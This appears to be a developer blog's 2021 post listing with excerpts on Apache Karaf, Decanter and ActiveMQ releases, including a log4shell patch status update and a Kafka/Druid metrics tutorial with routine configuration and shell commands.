Posts

Showing posts from 2021

Apache Karaf runtime 4.3.5 and 4.2.14 are available, status regarding log4shell

You probably heard about security issue concerning log4j. This vulnerability in log4j is called log4shell. Basically, log4shell exploit gives attackers a simple way to execute code on any vulnerable machine. To exploit the vulnerability, an attacker has to cause the application to save a special string of characters in the log. The log4j community quickly fix this issue by releasing corrected version, starting from log4j 2.15.0 up to 2.17.0. In Apache Karaf runtime, we don't directly use log4j (or any logging framework). Karaf leverages Pax Logging which abstract/package the logging framework in a central logging service. Pax Logging API bundle reshape log4j, logback, slf4j, etc packages. The first step to do is to upgrade the log4j packages in Pax Logging and cut new Pax Logging releases. It's what we did: Pax Logging 2.0.12 has been released, upgrading to log4j 2.17.0 (fixing CVE-2021-45105 and CVE-2021-44228) and logback 1.2.9 (fixing CVE-2021-42550) Pax Logg

What's new in Apache Karaf Decanter 2.8.0?

Apache Karaf Decanter 2.8.0 has just been released. This release includes several fixes, improvements, and dependency updates. I encourage all Decanter users to update to 2.8.0 release ;) In this blog post, I will highlight some important changes and fixes we did in this release. Prometheus appender The Prometheus appender has been improved to expose more gauges. As reminder, the Decanter Prometheus appender is basically a servlet that expose Prometheus compliant data, that Prometheus instances can poll to get the latest updated metrics. Prometheus appender only looking for numeric data (coming from the Decanter collectors) to create and expose gauges. Unfortunately, in previous Decanter releases, Prometheus appender only looking for numeric value for "first level" properties. It means if a collected data property value was a Map , no inner data was considered by Prometheus appender, even if inner values were numeric. That's the first improvem

What's new in Apache Karaf runtime 4.3.3?

Apache Karaf runtime 4.3.3 has been released. This release contains a bunch of fixes, dependency updates, and improvement. I will share some highlights in this release. You can download Apache Karaf runtime here: http://karaf.apache.org/download.html . The release notes are available here: https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12311140&version=12350142 . JDK17 support for build and runtime Karaf 4.3.3 now fully supports JDK17 both at build time and runtime. For JDK17 support, we did: new ASM version new JDK options at runtime new packages exported by Karaf Cleanly close SSH connection We identified an issue with the Karaf SSH connections. The SSH connections were not cleanly close, and we had to wait the timeout to close the socket. It means that we can have this state once the SSH client disconnects: $ netstat | grep 8101 tcp6 0 0 localhost:8101 localhost:47844 CLOSE_WAIT 4.3.3 fixes

Apache ActiveMQ 5.16.3 has been released

Apache ActiveMQ 5.16.3 has been released today. In this blog, I would like to highlights some changes we introduced in this release. Better Camel 3.x support and JMS2 dependency I've rewritten the Karaf features repository in ActiveMQ 5.16.3. Firt, the Karaf features doesn't contain inner repository anymore. The purpose is to let user pickup the version he wants at runtime. Concretely, it means that, in Karaf, ActiveMQ 5.16.3 can already use Spring 5 (fully Spring 5 support including in the ActiveMQ standalone distribution is already done on main branch for ActiveMQ 5.17.x). By the way, I will do similar improvement in Apache CXF and Apache Camel features repositories (removing inner repository to let users pick up at runtime), and Karaf will provides a spec features in a dedicated features repository. I also updated the range to support JMS 2.x dependency, instead of always forcing JMS 1.x. Even if ActiveMQ 5.16.3 doesn't really support JMS 2, you can already

What's new in Apache Karaf runtime 4.3.2 ?

Apache Karaf runtime 4.3.2 has been released and available on https://karaf.apache.org . You can have take a look on the Release Notes . Let's take a quick tour on this new Karaf release. Support R7 configutation factory and fix on json check Karaf 4.3.x introduced both suppport of OSGi Spec R7 and json configuration support (in addition of the "regular" cfg/properties format). We identify an issue in the configuration json format: when the json contains an array, then it was always considered as updated. For instance, the following configuration: { "foo": [ "bar" ] } was considered as always updated. We can see in the log: 2021-05-07T23:01:45,924 | INFO | fileinstall-/[...]/karaf/etc | JsonConfigInstaller | 25 - org.apache.karaf.config.core - 4.3.1 | Updating configuration from my.config.json 2021-05-07T23:03:45,924 | INFO | fileinstall-/[...]/karaf/etc | JsonConfigInstaller | 25 - org.apache.karaf.config.co

What's new in Apache ActiveMQ 5.16.2 ?

Apache ActiveMQ 5.15.15 and 5.16.2 has been released. 5.15.15 is the last planned one on the 5.15.x branch, and contains only bug fixes. If you use ActiveMQ 5.15.x, you should upgrade to 5.16.x. Now, we are focusing on 5.16.x and coming 5.17.x (see later in this blog). ActiveMQ 5.16.2 brings important fixes and improvements. Let's take a quick tour ;) Fix on failover priorityBackup When you have brokers located on different networks, failver priortyBackup allows you to specify a preference to "local" broker. For instance, you can use a broker URL like this: failover:(tcp://local:61616,tcp://remote:61616)?randomize=false&priorityBackup=true With this URL, client will try to connect to tcp://local:61616 and stay connected there. The client will connect to remote only if local is not there. However, client will constantly try to reconnect to local . Once the client can do it (when local is back), he will automatically reconnect. By default, the first U

What's new in Apache Karaf 4.3.1 ?

Apache Karaf 4.3.1 has just been released. It's now available on http://karaf.apache.org/download.html . It contains the same features as Apache Karaf 4.2.11, you can find on https://nanthrax.blogspot.com/2021/03/whats-new-in-apache-karaf-4211.html . Of course, Karaf 4.3.1 contains some specific fixes and improvements. Updated system packages (for OSGi R7) Since OSGi R7, the java.* packages should be exported by the framework (aka system packages). As Karaf 4.3.x is based on OSGi R7, it should do it. Karaf uses configuration file to list the packages exported by itself. Regarding the packages provided by the JDK, Karaf use etc/jre.properties to export the packages depending of the JDK version (aka the execution environment). Karaf 4.3.1 has been updated to cleanly export java.* packages, and it has been done by adding these packages in etc/jre.properties configuration file. Features JSON format Karaf Features is the main provisioning extension for Apache Karaf. Basic

What's new in Apache Karaf 4.2.11 ?

Even if Apache Karaf 4.2.11 is a "minor" version on the Karaf 4.2.x series, it brings some interesting small stuff ;) Karaf BoM Like Apache Karaf 4.3.0, Karaf 4.2.11 now provides a Bill Of Material (BoM) siplifying the management of Karaf dependencies version. All Karaf examples now use the BoM. In your project, you can use the Karaf BoM like this: <dependencyManagement> <dependencies> <dependency> <groupId>org.apache.karaf</groupId> <artifactId>karaf-bom</artifactId> <version>4.2.11</version> <type>pom</type> <scope>import</scope> </dependency> </dependencies> </dependencyManagement> The BoM provides all Karaf dependencies. It means you can use directly the Karaf dependencies like this: <dependency> <groupId>o

What's new in Apache Karaf Decanter 2.7.0 ?

Image
Apache Karaf Decanter 2.7.0 release is currently on vote. I'm a little bit anticipating to the release to do some highlights about what's coming ;) Karaf Decanter 2.7.0 is an important milestone as it brings new features, especially around big data and cloud. HDFS and S3 appenders Decanter 2.7.0 brings two new appenders: HDFS and S3 appenders. The HDFS appender is able to store the collected data on HDFS (using CSV format by default). Similary, S3 appender store the collected data as an object into a S3 bucket. Let's illustrate this with a simple use case using S3 appender. First, let's create a S3 bucket on AWS: So, now we have our decanter-test S3 bucket ready. Let's start a Karaf instance with Decanter S3 appender enabled: Then, we configure S3 appender in etc/org.apache.karaf.decanter.appender.s3.cfg : ############################### # Decanter Appender S3 Configuration ############################### # AWS credentials accessKeyId=... secr

Complete metrics collections and analytics with Apache Karaf Decanter, Apache Kafka and Apache Druid

Image
In this blog post, I will show how to extend the Karaf Decanter as log and metrics collection with storage and analytic powered by Apache Druid. The idea is to collect machine metrics (using Decanter OSHI collector for instance), send to a Kafka broker and aggregate and analyze the metrics on Druid. Apache Kafka We can ingest data in Apache Druid using several channels (in streaming mode or batch mode). For this blog post, I will use streaming mode with Apache Kafka. For the purpose of the blog, I will simply start a zookeeper: $ bin/zookeeper-server-start.sh config/zookeeper.properties and kafka 2.6.1 broker: $ bin/kafka-server-start.sh config/server.properties ... [2021-01-19 14:57:26,528] INFO [KafkaServer id=0] started (kafka.server.KafkaServer) I'm create a decanter topic where we gonna send the metrics: $ bin/kafka-topics.sh --bootstrap-server localhost:9092 --create --topic decanter --partitions 2 $ bin/kafka-topics.sh --bootstrap-server localhost:9092 -